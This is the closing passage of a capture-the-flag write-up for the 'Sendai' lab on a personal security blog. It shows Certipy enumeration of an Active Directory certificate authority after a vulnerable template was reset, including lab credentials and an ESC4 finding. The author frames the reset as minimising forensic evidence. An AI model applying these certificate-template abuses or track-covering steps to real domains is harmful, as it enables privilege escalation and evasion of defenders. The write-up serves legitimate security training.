[*]     msPKI-Certificate-Application-Policy: ['1.3.6.1.5.5.7.3.1', '1.3.6.1.5.5.7.3.2']
Are you sure you want to apply these changes to 'SendaiComputer'? (y/N): y
[*] Successfully updated 'SendaiComputer'

Verification of Template Restoration#

A final verification confirmed that the certificate template was restored to its original secure configuration, with the ESC1 vulnerability no longer present:

Terminal window
└─$ certipy-ad find -u "clifford.davey" -p "RFmoB2WplgE_3p"  -dc-ip 10.129.140.152 -dc-host dc.sendai.vl  -ns 10.129.140.152 -enabled -stdout -vulnerable
Certipy v5.0.3 - by Oliver Lyak (ly4k)


[*] Finding certificate templates
[*] Found 34 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 12 enabled certificate templates
[*] Finding issuance policies
[*] Found 16 issuance policies
[*] Found 0 OIDs linked to templates
[*] Retrieving CA configuration for 'sendai-DC-CA' via RRP
[!] Failed to connect to remote registry. Service should be starting now. Trying again...
[*] Successfully retrieved CA configuration for 'sendai-DC-CA'
[*] Checking web enrollment for CA 'sendai-DC-CA' @ 'dc.sendai.vl'
[*] Enumeration output:
Certificate Authorities
  0
    CA Name                             : sendai-DC-CA
    DNS Name                            : dc.sendai.vl
    Certificate Subject                 : CN=sendai-DC-CA, DC=sendai, DC=vl
    Certificate Serial Number           : 326E51327366FC954831ECD5C04423BE
    Certificate Validity Start          : 2023-07-11 09:19:29+00:00
    Certificate Validity End            : 2123-07-11 09:29:29+00:00
    Web Enrollment
      HTTP
        Enabled                         : False
      HTTPS
        Enabled                         : False
    User Specified SAN                  : Disabled
    Request Disposition                 : Issue
    Enforce Encryption for Requests     : Enabled
    Active Policy                       : CertificateAuthority_MicrosoftDefault.Policy
    Permissions
      Owner                             : SENDAI.VL\Administrators
      Access Rights
        ManageCa                        : SENDAI.VL\Administrators
                                          SENDAI.VL\Domain Admins
                                          SENDAI.VL\Enterprise Admins
        ManageCertificates              : SENDAI.VL\Administrators
                                          SENDAI.VL\Domain Admins
                                          SENDAI.VL\Enterprise Admins
        Enroll                          : SENDAI.VL\Authenticated Users
Certificate Templates
  0
    Template Name                       : SendaiComputer
    Display Name                        : SendaiComputer
    Certificate Authorities             : sendai-DC-CA
    Enabled                             : True
    Client Authentication               : True
    Enrollment Agent                    : False
    Any Purpose                         : False
    Enrollee Supplies Subject           : False
    Certificate Name Flag               : SubjectAltRequireDns
    Enrollment Flag                     : AutoEnrollment
    Extended Key Usage                  : Server Authentication
                                          Client Authentication
    Requires Manager Approval           : False
    Requires Key Archival               : False
    Authorized Signatures Required      : 0
    Schema Version                      : 2
    Validity Period                     : 100 years
    Renewal Period                      : 6 weeks
    Minimum RSA Key Length              : 4096
    Template Created                    : 2023-07-11T12:46:12+00:00
    Template Last Modified              : 2025-09-17T22:42:07+00:00
    Permissions
      Enrollment Permissions
        Enrollment Rights               : SENDAI.VL\Domain Admins
                                          SENDAI.VL\Domain Computers
                                          SENDAI.VL\Enterprise Admins
      Object Control Permissions
        Owner                           : SENDAI.VL\Administrator
        Full Control Principals         : SENDAI.VL\Domain Admins
                                          SENDAI.VL\Enterprise Admins
                                          SENDAI.VL\ca-operators
        Write Owner Principals          : SENDAI.VL\Domain Admins
                                          SENDAI.VL\Enterprise Admins
                                          SENDAI.VL\ca-operators
        Write Dacl Principals           : SENDAI.VL\Domain Admins
                                          SENDAI.VL\Enterprise Admins
                                          SENDAI.VL\ca-operators
        Write Property Enroll           : SENDAI.VL\Domain Admins
                                          SENDAI.VL\Domain Computers
                                          SENDAI.VL\Enterprise Admins
    [+] User Enrollable Principals      : SENDAI.VL\ca-operators
                                          SENDAI.VL\Domain Computers
    [+] User ACL Principals             : SENDAI.VL\ca-operators
    [!] Vulnerabilities
      ESC4                              : User has dangerous permissions.

The template had been successfully restored to its original state, showing only the ESC4 vulnerability (which required the CA-OPERATORS group membership to exploit). This completed the attack chain while minimizing forensic evidence of the compromise.

Sendai
https://dahmanisec.me/posts/sendai/
Author
Abderrahim Dahmani
Published at
2025-09-10
License
CC BY-NC-SA 4.0
Data
VulnCicada
© 2025 Abderrahim Dahmani. All Rights Reserved. / RSS / Sitemap
Powered by Astro & Fuwari